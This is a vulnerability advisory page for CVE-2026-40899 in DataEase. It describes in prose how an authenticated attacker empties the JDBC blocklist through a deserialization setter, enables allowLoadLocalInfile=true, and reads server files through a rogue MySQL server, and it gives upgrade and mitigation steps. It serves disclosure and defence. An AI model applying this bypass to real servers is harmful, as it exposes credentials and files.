CVE-2026-40899
JDBC Parameter Blocklist Bypass in DataEase Enables Arbitrary File Read
Publication date: 2026-04-16
Last updated on: 2026-04-20
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dataease | dataease | to 2.10.21 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-183 | The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in DataEase, an open-source data visualization and analytics platform, specifically in versions 2.10.20 and below. It involves a JDBC parameter blocklist bypass in the MySQL datasource configuration. The Mysql class uses Lombok's @Data annotation, which automatically generates a public setter for the illegalParameters field that holds the JDBC security blocklist.
When a datasource configuration is submitted as JSON, the Jackson deserialization process calls the setIllegalParameters method with an attacker-supplied empty list. This action replaces the blocklist before the getJdbc() validation runs, effectively bypassing the security blocklist.
As a result, an authenticated attacker can include dangerous JDBC parameters such as allowLoadLocalInfile=true. By pointing the datasource at a rogue MySQL server, the attacker can exploit the LOAD DATA LOCAL INFILE protocol feature to read arbitrary files from the DataEase server filesystem, including sensitive environment variables and database credentials.
This vulnerability was fixed in version 2.10.21.
How can this vulnerability impact me? :
This vulnerability can have serious impacts if exploited. An authenticated attacker can bypass the JDBC parameter blocklist and enable dangerous parameters like allowLoadLocalInfile=true.
By exploiting the LOAD DATA LOCAL INFILE protocol feature, the attacker can read arbitrary files from the DataEase server's filesystem. This includes sensitive information such as environment variables and database credentials.
Such unauthorized access to sensitive files can lead to data breaches, compromise of server integrity, and further exploitation of the system.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, you should upgrade DataEase to version 2.10.21 or later, where the issue has been fixed.
Additionally, restrict authenticated users from modifying datasource configurations or submitting JSON that could alter the JDBC parameter blocklist.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows an authenticated attacker to bypass JDBC parameter blocklists and read arbitrary files from the server filesystem, including sensitive environment variables and database credentials.
This exposure of sensitive data could lead to non-compliance with data protection regulations such as GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access.
Therefore, exploitation of this vulnerability may result in violations of these standards due to potential unauthorized disclosure of protected data.